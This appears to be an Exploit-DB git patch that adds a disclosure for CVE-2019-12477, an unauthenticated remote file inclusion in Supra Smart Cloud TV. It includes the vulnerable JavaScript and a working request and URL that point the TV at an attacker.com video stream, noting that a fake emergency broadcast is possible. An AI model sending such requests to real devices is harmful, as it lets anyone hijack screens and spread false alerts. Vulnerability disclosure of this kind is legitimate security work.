From 35d500a3cba1386927a16d5783af1cd92136df4f Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 7 Jun 2019 05:01:54 +0000 Subject: [PATCH] DB: 2019-06-07 1 changes to exploits/shellcodes Supra Smart Cloud TV - 'openLiveURL()' Remote File Inclusion --- exploits/hardware/webapps/46971.txt | 59 +++++++++++++++++++++++++++++ files_exploits.csv | 1 + 2 files changed, 60 insertions(+) create mode 100644 exploits/hardware/webapps/46971.txt diff --git a/exploits/hardware/webapps/46971.txt b/exploits/hardware/webapps/46971.txt new file mode 100644 index 000000000..b8a2c3419 --- /dev/null +++ b/exploits/hardware/webapps/46971.txt @@ -0,0 +1,59 @@ +Exploit Title: Remote file inclusion +# Date: 03-06-2019 +# Exploit Author: Dhiraj Mishra +# Vendor Homepage: https://supra.ru +# Software Link: https://supra.ru/catalog/televizory/televizor_supra_stv_lc40lt0020f/ +# CVE: CVE-2019-12477 +# References: +# https://nvd.nist.gov/vuln/detail/CVE-2019-12477 +# https://www.inputzero.io/2019/06/hacking-smart-tv.html + +Summary: +Supra Smart Cloud TV allows remote file inclusion in the openLiveURL +function, which allows a local attacker to broadcast fake video without any +authentication via a /remote/media_control?action=setUri&uri=URI + +Technical Observation: +We are abusing `openLiveURL()` which allows a local attacker to broadcast +video on supra smart cloud TV. I found this vulnerability initially by +source code review and then by crawling the application and reading every +request helped me to trigger this vulnerability. + +Vulnerable code: + + function openLiveTV(url) + { + $.get("/remote/media_control", +{m_action:'setUri',m_uri:url,m_type:'video/*'}, + function (data, textStatus){ + if("success"==textStatus){ + alert(textStatus); + }else + { + alert(textStatus); + } + }); + } + +Vulnerable request: + + GET /remote/media_control?action=setUri&uri= +http://attacker.com/fake_broadcast_message.m3u8 HTTP/1.1 + Host: 192.168.1.155 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) +Gecko/20100101 Firefox/66.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Connection: close + Upgrade-Insecure-Requests: 1 + +To trigger the vulnerability you can send a crafted request to the URL, + +http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8 + +Although the above mention URL takes (.m3u8) format based video. We can use +`curl -v -X GET` to send such request, typically this is an unauth remote +file inclusion. An attacker could broadcast any video without any +authentication, the worst case attacker could leverage this vulnerability +to broadcast a fake emergency message. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 303f7480f..1d0c9c584 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -41379,3 +41379,4 @@ id,file,description,date,author,type,platform,port 46965,exploits/java/webapps/46965.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'SearchN.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java, 46966,exploits/java/webapps/46966.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'PurchaseRequest.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java, 46967,exploits/jsp/webapps/46967.py,"Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery",2019-06-05,k8gege,webapps,jsp, +46971,exploits/hardware/webapps/46971.txt,"Supra Smart Cloud TV - 'openLiveURL()' Remote File Inclusion",2019-06-06,"Dhiraj Mishra",webapps,hardware,